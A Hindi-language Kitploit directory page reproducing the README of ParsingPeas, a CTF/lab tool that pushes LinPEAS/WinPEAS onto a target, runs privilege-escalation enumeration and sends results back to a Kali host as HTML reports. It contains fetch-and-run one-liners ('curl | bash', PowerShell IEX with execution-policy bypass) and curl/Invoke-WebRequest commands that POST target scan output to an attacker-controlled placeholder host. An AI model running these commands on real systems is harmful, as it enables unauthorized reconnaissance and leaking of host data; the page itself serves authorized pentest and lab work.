Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ParsingPeas — PEAS आउटपुट के लिए HTML पार्सर अतिरिक्त सुविधाओं के साथ | Kitploit
उपकरण/GitHubGitHub/yuvalmil/parsingpeas
विशेषाधिकार वृद्धिस्क्रिप्टिंग और स्वचालनजानकारी एकत्र करनापोस्ट-शोषणCTFपेनिट्रेशन टेस्टिंगउपयोगिताएँ और फ्रेमवर्कलर्निंग और शिक्षालैब और अभ्यास
GitHubyuvalmil/parsingpeas

ParsingPeas

PEAS आउटपुट के लिए HTML पार्सर अतिरिक्त सुविधाओं के साथ

1591432 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

ParsingPeas 🥒

स्वचालित PEASS संग्रह + CTF और लैब विशेषाधिकार-वृद्धि कार्य के लिए एक साफ, पोर्टेबल HTML रिपोर्ट।

License: MIT Python 3.8+

लक्ष्य पर एक कमांड चलाएँ। ParsingPeas आपके Kali होस्ट से LinPEAS/WinPEAS खींचता है, स्कैन चलाता है, आउटपुट वापस भेजता है, और इसे एक एकल स्व-निहित HTML रिपोर्ट में बदल देता है जिसे आप पढ़ सकते हैं, खोज सकते हैं, ट्रायज कर सकते हैं और रख सकते हैं — कोई मैन्युअल फ़ाइल स्थानांतरण नहीं, लक्ष्य पर इंटरनेट की आवश्यकता नहीं।


स्क्रीनशॉट

रिपोर्ट सारांश — LinPEAS की अपनी श्रेणियों द्वारा समूहित अनुभाग, फ़ाइंडिंग डॉट्स और फ़ाइंडिंग बार के साथ:

रिपोर्ट सारांश

केवल फ़ाइंडिंग — एक क्लिक रिपोर्ट और साइडबार को महत्वपूर्ण/उच्च हिट वाले अनुभागों तक फ़िल्टर करता है:

केवल फ़ाइंडिंग

पूर्ण टर्मिनल आउटपुट — पूर्ण, रंग-युक्त स्कैन; Ctrl-F से खोजने योग्य:

पूर्ण टर्मिनल आउटपुट


क्यों

कच्चा PEASS आउटपुट स्क्रॉलिंग टर्मिनल टेक्स्ट की एक दीवार है जो आपके शेल के मरते ही गायब हो जाता है। ParsingPeas:

  • स्वचालित करता है — कोई scp नहीं, खुद linpeas होस्ट करने की आवश्यकता नहीं, आउटपुट को वापस Kali में कॉपी-पेस्ट करने की आवश्यकता नहीं।
  • इसे सुरक्षित रखता है — प्रत्येक स्कैन आपके होस्ट पर एक टाइमस्टैम्प्ड HTML रिपोर्ट बन जाता है।
  • इसे नेविगेबल बनाता है — आउटपुट LinPEAS के वास्तविक अनुभागों में विभाजित होता है एक वर्गीकृत साइडबार, फ़ाइंडिंग हाइलाइट्स और पूर्ण-पाठ खोज के साथ।
  • अच्छी तरह से यात्रा करता है — प्रत्येक रिपोर्ट एक एकल स्व-निहित .html फ़ाइल है जिसे आप बॉक्स से कॉपी कर सकते हैं, संग्रहीत कर सकते हैं, या डबल-क्लिक करके ऑफ़लाइन खोल सकते हैं।

यह प्रस्तुति + लॉजिस्टिक्स है, एक एक्सप्लॉइट इंजन नहीं: यह PEASS के अपने रंग और फ़ाइंडिंग को संरक्षित करता है, उन पर दूसरा अनुमान लगाने के बजाय।


विशेषताएं

  • वन-लाइनर वर्कफ़्लो — लक्ष्य आपके होस्ट से रैपर डाउनलोड करता है, PEASS चलाता है, और परिणाम को स्वचालित रूप से वापस POST करता है।
  • लक्ष्य पर ऑफ़लाइन काम करता है — सब कुछ आपके Kali होस्ट से परोसा जाता है।
  • विश्वसनीय अनुभाग पार्सिंग — LinPEAS के वास्तविक दो-स्तरीय हेडर पदानुक्रम का पालन करता है (प्रमुख अनुभाग + उप-जांच); हैकट्रिक्स लिंक और चेक लाइनें विषय-सूची को दूषित करने के बजाय सामग्री के रूप में रहती हैं।
  • स्व-निहित रिपोर्ट — टर्मिनल आउटपुट इनलाइन एम्बेडेड है; एक फ़ाइल, कोई साइडकार नहीं, file:// के माध्यम से खुलता है।
  • इंटरैक्टिव रिपोर्ट दृश्य:
    • साइडबार TOC PEASS के अपने अनुभागों द्वारा समूहित, महत्वपूर्ण/उच्च गणना के साथ।
    • फ़ाइंडिंग बार — N critical / N high चिप्स जो फ़्लैग किए गए अनुभागों के बीच कूदते हैं, साथ ही एक रंग लीजेंड।
    • त्वरित ट्रायज के लिए केवल-फ़ाइंडिंग फ़िल्टर।
    • लाइन-रैप टॉगल (डिफ़ॉल्ट रूप से चालू — अब कोई ट्रंकेटेड लाइन नहीं)।
    • स्क्रॉलस्पाई — स्क्रॉल करते समय TOC में वर्तमान अनुभाग हाइलाइट होता है।
    • स्टिकी सेक्शन हेडर और "पढ़ा गया चिह्नित करें" डॉट्स जो बने रहते हैं (localStorage, प्रति रिपोर्ट)।
    • वर्तमान उपयोगकर्ता (रूट होने पर लाल) और OS के लिए हेडर बैज।
  • पूर्ण टर्मिनल आउटपुट टैब — पूर्ण, पूर्ण-रंगीन स्कैन, एक ही पास में प्रस्तुत किया गया ताकि ब्राउज़र का Ctrl-F इसके सभी भागों में खोज कर सके।
  • म्यूट डार्क थीम — लंबे सत्रों के लिए आंखों पर आसान।
  • Linux और Windows — LinPEAS (bash) और WinPEAS (PowerShell)।

त्वरित आरंभ

अपने Kali होस्ट पर

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # downloads LinPEAS + WinPEAS into scripts/
pip3 install -r requirements.txt
python3 receiver.py             # serves on http://0.0.0.0:8005

receiver.py को चलने दें। वह IP पता करें जिस पर लक्ष्य आप तक पहुंचेगा:

  • HTB / VPN: आपका tun0 पता — ip -4 addr show tun0
  • LAN: आपका सामान्य इंटरफ़ेस IP

लक्ष्य पर

Linux/Unix (curl का उपयोग करता है, wget पर गिरता है):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

Windows (PowerShell / रिवर्स शेल):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

वह वन-लाइनर चुनें जो लक्ष्य OS से मेल खाता हो — Linux LinPEAS परोसता है, Windows WinPEAS परोसता है।

रिपोर्ट देखें

रिपोर्टें आपके Kali होस्ट पर ./reports/ में उत्पन्न होती हैं। या तो:

  • http://YOUR_KALI_IP:8005 पर इंडेक्स ब्राउज़ करें और एक रिपोर्ट पर क्लिक करें, या
  • उत्पन्न फ़ाइल को सीधे खोलें — यह स्व-निहित है:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

उस एकल .html को जहाँ चाहें कॉपी करें; यह अपने आप काम करता है।


यह कैसे काम करता है

root@kitploit:~
Target → downloads wrapper from Kali → runs PEASS → POSTs output → Kali parses → self-contained HTML report

लक्ष्य को कभी इंटरनेट की आवश्यकता नहीं होती — रैपर और PEASS बाइनरी सभी आपके होस्ट से परोसे जाते हैं।


रिपोर्ट का उपयोग करना

  • रिपोर्ट सारांश टैब — साइडबार में PEASS श्रेणी द्वारा समूहित अनुभाग। लाल/पीले डॉट्स महत्वपूर्ण/उच्च फ़ाइंडिंग वाले अनुभागों को चिह्नित करते हैं। सीधे उन पर जाने के लिए फ़ाइंडिंग चिप्स का उपयोग करें, या बाकी सब छिपाने के लिए केवल फ़ाइंडिंग का उपयोग करें।
  • पूर्ण टर्मिनल आउटपुट टैब — पूर्ण रंगीन स्कैन। बस Ctrl-F दबाकर खोजें; पूरा आउटपुट प्रस्तुत किया गया है, इसलिए मूल खोज इसके सभी भागों को कवर करती है।
  • किसी फ़ाइंडिंग डॉट पर क्लिक करके एक अनुभाग को पढ़ा हुआ चिह्नित करें — यह रिपोर्ट को पुनः खोलने पर भी पढ़ा हुआ रहता है।

मैन्युअल उपयोग

यदि वन-लाइनर विफल हो जाए, तो इसे मैन्युअल रूप से करें।

Linux:

root@kitploit:~
# On target
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Send back
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

Windows (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

आपके पास पहले से मौजूद PEASS डंप को पार्स करें:

root@kitploit:~
python3 parser.py /path/to/peas_output.txt   # writes an HTML report to ./reports/

कॉन्फ़िगरेशन

receiver.py के शीर्ष को संपादित करें:


समस्या निवारण

  • स्क्रिप्ट डाउनलोड नहीं कर सकते? कनेक्टिविटी जांचने के लिए curl http://KALI_IP:8005/health चलाएँ; फ़ायरवॉल खोलने के लिए sudo ufw allow 8005/tcp चलाएँ।
  • /get-linpeas पर 404? PEASS बाइनरी लाने के लिए ./setup.sh चलाएँ।
  • PowerShell रिवर्स शेल में कोई लाइव आउटपुट नहीं? अपेक्षित — स्कैन अभी भी चलता है; अपलोड की पुष्टि के लिए अपने रिसीवर को देखें।

सुरक्षा

⚠️ केवल अधिकृत पैठ परीक्षण, CTF और प्रयोगशाला उपयोग के लिए।

  • कोई प्रमाणीकरण नहीं — इसे केवल पृथक/CTF नेटवर्क पर, फ़ायरवॉल के पीछे चलाएँ।
  • अपलोड हेडर मान स्वच्छ किए जाते हैं और अपलोड का आकार सीमित है, लेकिन सर्वर को शत्रुतापूर्ण इंटरनेट एक्सपोज़र के लिए कठोर नहीं किया गया है।

श्रेय

PEASS-ng पर निर्मित, जो @carlospolop द्वारा। ParsingPeas केवल इसके आउटपुट को एकत्र और प्रस्तुत करता है।


MIT लाइसेंस · योगदान का स्वागत है

टूल डाउनलोड करें
सेटिंगडिफ़ॉल्टनोट्स
Port8005app.run(... port=...) लाइन बदलें
OUTPUT_DIR./received_outputsकच्चे अपलोड किए गए स्कैन
REPORTS_DIR./reportsउत्पन्न HTML रिपोर्टें
SCRIPTS_DIR./scriptsLinPEAS/WinPEAS बाइनरी
MAX_UPLOAD_SIZE10 MBलागू — बड़े अपलोड को HTTP 413 मिलता है